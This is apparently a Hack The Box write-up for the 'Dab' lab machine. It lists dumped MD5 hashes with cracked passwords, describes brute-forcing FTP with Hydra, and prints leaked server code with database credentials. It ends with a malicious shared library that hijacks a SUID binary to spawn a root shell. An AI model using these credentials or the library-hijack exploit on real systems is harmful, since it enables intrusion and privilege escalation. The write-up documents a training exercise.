"ivah": "2b0535023a614acafb7b7f5fbb91eb3b",

"xander_schoen": "efbbd15b30cbfe2a206ca1291deca009",

"shea": "d2736f6b7b47a40b1615af3ae419f6ab",

"donny": "94e406b569e15565746d0a9592636f56",

"jimmie": "4950c4c8e41c25a0c4cc913ff3f96ef1",

"kathlyn": "34b8bce72871d15ced725cc1184f8f4a",

"cleve_mckenzie": "4ae1a59c3cbaa065adbf26b904fa6781",

"ashtyn.will": "d249b651702c68a2ed1fcfe2b4d99987",

"presley.weissnat": "7b5168687749996ab74316a885e2b881",

"marjolaine": "947c16a51f8e590debf7c9105d64c7df",

"vivian": "ef0ca75e2d27434d2c4e02ac2c0f0c6e",

"jennings": "41121d6da3615554ad0e0d01172634ba",

"merritt_marks": "08ab1f602ea471e4e1a04f3934ec73e9",

"efrain.hoppe": "31446ccc8161d50e2cecc133e0b11f85",

"carol": "1f7374359d1456c11497aeaea408f84a",

"genoveva_carter": "8838d8fd3db319f7a6a67d0ab5e52021",

"jevon": "9e876fe23bd371b5bf7c07ca3f6d7634",

"julia_monahan": "4c7fc2df5576ee3b68c5c79a755a0d33",

"stanton_reynolds": "eed7a216ee2b9026591a29354acd3193",

"tyrel": "150937304c73b4088c35c574d2f41f03",

"carolyn": "4e2de8249eaeb94175a3e4824ff66c7c",

"willow_mayer": "c65ea95f54056088f616601766eaa2db",

"elenora_hahn": "919cff95c01cf51e2fd9a74db418c4bf",

"jacinto.yundt": "ff5c237762ac41b30e59bc7b21042ba7",

"aliyah": "20b4192f696213a8f4c7e5c7f84d60d1",

"wade": "90346439328d6a4dd28af2b68acd5048",

"leonel.marquardt": "ed98c3ce8aea0881334fe76de885dfc4",

"marie": "7905c8fa4ede73a339906006b0e9c7c9",

"jany": "a0a84994d69b3e738c1ac376df1dcabf",

"vicky.hansen": "3e92536b0a568ede949bf1589bd16318",

"arielle.sauer": "4bbe939fc8ac2d9bffc36aed5dacb9b1",

"angelina.murazik": "aea180b10da81b62ffb6f35c033d99b1",

"marcelo_brown": "f016e357657692aa181ca3cdfaf7b811",

"eulah": "d772f9b38c9aa2d457c034d838c1be21",

"jerrell": "1fe4031155a1412eb41f806740209cb0",

"robyn_koepp": "edb235d64e26dfe7eecf820aeec20d09",

"johnathon": "1cc714db88bbf5cd11ce6de641bf9e8d",

"jacquelyn": "8189067a15ac1a5f5d57b6520b3c5c98",

"nickolas.muller": "6bdde7ca2ab71fbb063c4d94ba7a0cb0",

"lilliana_cummings": "c9c4cc2813f63b6da914965e41ba3476",

"rachelle": "8d783621dfdb8722a80b5b10a45632ee",

"lauretta": "eb462e1df69951cfb55d2cee556a49cb",

"cordie.ortiz": "e12fa6b635222f258e1b0729755f3746",

"rick": "0daa6275280be3cf03f9f9c62f9d26d1",

"karl_hane": "1707c74ab5a1f96b9561a5b905b4f0f0",

"gail": "5ae72fc8f3cb837ea4199362d70d7ae7",

"adelia.berge": "bab4822dc29350a71e1015c916782713",

"bud": "a994cdb47a8f661d7c091f84d4bd17ce",

"rahul": "4b6d890ff0ba849d2724ace69db763c3",

"stanford": "29de69a508e1f96a87898f50a564b9a6",

"default": "c21f969b5f03d33d43e04f8f136e7682",

"emie": "f519fdd188bb126dc912227a8163745c",

"anna.bins": "10a6fffd7be7a218b2bd3507dc175dc5",

"dane_wyman": "0ba31824ccdb1e133f79ad04f3855e40",

"arne": "a791bbdf84fd98116c04246573d98e4a",

"nat.wilkinson": "dcefd200f4856aeda1fc721a544fa717",

"gerda": "377fc2d8b7c81f91708352491bc5d1e9",

"roselyn_streich": "e32eebf5d2da2d61f08e5e4dfff04029",

"d_murphy": "254e5f2c3beb1a3d03f17253c15c07f3",

"jacynthe.kiehn": "bc8bb4c0f4ce272086b2cf02f6123f1d",

"kianna_block": "bceee353497d21dad6b745d668d1ba3c",

"manley": "be362c649da16df9d5a9fa854ddd3a24",

"chaz": "648a629ea7ac036a9837e72da9f1fac5",

"joanie_zboncak": "0297dc52c8540050dad5fc82aaa3026b",

"adolph.kohler": "65b6d8708f1e865ca9378fec74407ce6",

"dejon": "389bfdf3859555f26c28827583237c57",

"dorcas": "2a9bed3bb2052c644a7f3130ddc78546",

"benjamin.pfannerstill": "67b3ded77ab0a3f4eefd37a2ded00f48",

"onie_kreiger": "0406b1f270012cdafac8fab92fb0ccd5",

"jaquelin.medhurst": "63d75125cf5db3fe850cf359e0237992",

"heidi_krajcik": "adf27575ef70c773fed3cd82fa06fa1f",

"clement_cummerata": "4d71cd239acb3f9a5198159beaa05575",

"tess": "389e03628382fb010c729319953e4c78",

"lance": "b713cf03505e7e3b995f45f6df5e9460",

"ursula.weimann": "e12e607e7bdd2105cc3d68c33c0d905e",

"maximus_robel": "c3655a791fa65e0a75c849c1d56d66a1",

"irma": "5177790ad6df0ea98db41b37b602367c",

"lucie": "01971ddb0d362010a8e484f0630de1e9",

"devon": "953155467fab407a18cb7c8f576d1ef6",

"kory": "c40c83a8bd2914202bd22770405b0b4c",

"keely.reynolds": "8b0b59e115aad4d3deee62b591c80b28",

"adrianna": "3ceb64d1364a8c92134484029e4f2770",

"jaylin.langworth": "f3e06518bbfa9d108ad30cf5628e480a",

"agustin.kreiger": "a434c202f65475988efa9622a77f9594",

"shaylee_roob": "81dbedf631f0dd59d00403c661972c0a",

"zelma": "55f0db8276de5dc76d9b858bd0de78a0"

}

And we got a list of usernames and passwords. Let’s crack them!

admin:2ac9cb7dc02b3c0083eb70898e549b63:Password1

d_murphy:254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet

default:c21f969b5f03d33d43e04f8f136e7682:default

abbigail:9731e89f01c1fb943cf0baa6772d2875:piggy

aglae:0ef9c986fad340989647f0001e3555d4:misfits

ona:6f9ff93a26a118b460c878dc30e17130:monkeyman

alec:1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster

rick:0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1

wendell:eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth

genevieve:fc7992e8952a8ff5000cb7856d8586d2:Princess1

demo:fe01ce2a7fbac8fafaed7c982a04e229:demo

Loggin in as admin (or as any other user) got us a list of all items in stock.

And from the page source we know that those values are loaded from a database:

<!-- Debug... data tables were loaded from : MySQL DB -->

but there is no way to tamper the script or access the DB.



From users and passwords tuple found before we used Hydra to bruteforce the FTP.

Hydra

Connecting to the FTP we can read the first flag and enumerate the system since the FTP is not restricted and also we can connect to SSH with the same credentials.

FTP

User session

From SSH we can now retrieve the server side code used to dump the credentials from Memcache:

import re

from subprocess import check_output

from flask import Flask, render_template, request

app = Flask(__name__)



AUTH_ENABLED = True



def validate_cmd(cmd):

match = re.match("^[a-zA-Z0-9 ]*$", cmd)

return match is not None



@app.route("/")

def index():

error = None



if not 'password' in request.cookies and AUTH_ENABLED:

error = "Access denied: password authentication cookie not set"

return render_template("index.html", error=error)

if request.cookies.get('password') != 'secret' and AUTH_ENABLED:

error = "Access denied: password authentication cookie incorrect"

return render_template("index.html", error=error)



return render_template("index.html")



@app.route("/socket", methods=["GET"])

def socket_data():

port = request.args.get("port", default="", type=int)

cmd = request.args.get("cmd", default="", type=str)

if not cmd or not port:

error = "Missing parameters"

return render_template("index.html", error=error)



if port < 1 or port > 65535:

error = "Invalid port"

return render_template("index.html", error=error)



if not validate_cmd(cmd):

error = "Suspected hacking attempt detected"

return render_template("index.html", error=error)



data = check_output("echo '{}' | /bin/nc 127.0.0.1 {:d}".format(cmd, port), shell=True)



return render_template("index.html", socket_data=data)



if __name__ == "__main__":

app.run(host='0.0.0.0')

and MySQL credentials with JWT secret:

app = Flask(__name__)

app.config["MYSQL_DATABASE_USER"] = "dab_user"

app.config["MYSQL_DATABASE_PASSWORD"] = "kUi87_23$bxQsmk,a2"

app.config["MYSQL_DATABASE_DB"] = "dab"

app.config["MYSQL_DATABASE_HOST"] = "localhost"

app.config["SECRET_KEY"] = "todo_change_this"

app.config["SESSION_TYPE"] = "memcached"

But these information are not useful to privesc from genevieve to root .

From LinEnum scan we saw that in /usr/bin/ there is SUID binary called myexec .

Using radare2 we can see that the program asks for a password ( s3cur3l0g1n ) and then calls sys.imp.seclogin that is defined in a library called libseclogin.so (in the default library path /usr/lib ).

function main () {

// 6 basic blocks



loc_0x400836:



//DATA XREF from entry0 (0x40075d)

push rbp

rbp = rsp

rsp -= 0x70 //'p'

rax = qword fs:[0x28] //[0x28:8]=-1 ; '(' ; 40

qword [canary] = rax

eax = 0

movabs rax,0x306c337275633373 //'s3cur3l0'

qword [s1] = rax

dword [local_58h] = 0x6e3167 //'g1n'

edi = "Enter password: " //0x400974 ; str.Enter_password: ; const char *format

eax = 0



int printf(const char * format : 0x00400974 = Enter password:)

rax = qword [s2]

rsi = rax

edi = "%63s"s //0x400985 ; str.63s ; const char *format

eax = 0



int scanf(const char * format : 0x00400985 = %63s)

rdx = qword [s2]

rax = qword [s1] //"s3cur3l0g1n"

rsi = rdx //const char *s2

rdi = rax //const char *s1 ; "s3cur3l0g1n"



int strcmp(const char * s1 : 0x00177f98 = s3cur3l0g1n, const char * s2 : 0x00177fa8 =)

dword [local_64h] = eax

var = dword [local_64h] - 0

if (!var) goto 0x4008b4 //unlikely

{

loc_0x4008b4:



//CODE XREF from main (0x4008a1)

edi = "Password is correct

" //0x40099c ; str.Password_is_correct ; const char *s



int puts(const char * s : 0x0040099c = Password is correct.)

eax = 0

sym.imp.seclogin ()

eax = 0

do

{

loc_0x4008cd:



//CODE XREF from main (0x4008b2)

rcx = qword [canary]

rcx ^= qword fs:[0x28]

if (!var) goto 0x4008e1 //unlikely

} while (?);

} while (?);

}

return;



} genevieve@dab:/tmp$ ldd /usr/bin/myexec

linux-vdso.so.1 => (0x00007ffc1d5b0000)

libseclogin.so => /usr/lib/libseclogin.so (0x00007f81cc3e7000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f81cc01d000)

/lib64/ld-linux-x86-64.so.2 (0x00007f81cc5e9000)

The library libseclogin although do not implement the function but will just prints:

seclogin() called

TODO: Placeholder for now, function not implemented yet

We can exploit this SUID binary writing a libseclogin.so that will setuid(0);setguid(0); and spawn a root shell.

#include <unistd.h>



__attribute__((constructor)) static void seclogin() {

setgid(0); setuid(0);

execl("/bin/bash", "bash", (char *)0);

}

We can save the crafted library in /tmp since from /etc/ld.so.conf/test.conf we saw that we can use /tmp as library path.

__attribute__((constructor)) is required to make the library run the function on startup.

The file is compiled ugin gcc -shared -fPIC libseclogin.c -o libseclogin.c .

Uploading the library in /tmp and running myexec we got a root shell and the system flag!

System Flag

https://www.hackthebox.eu/profile/1752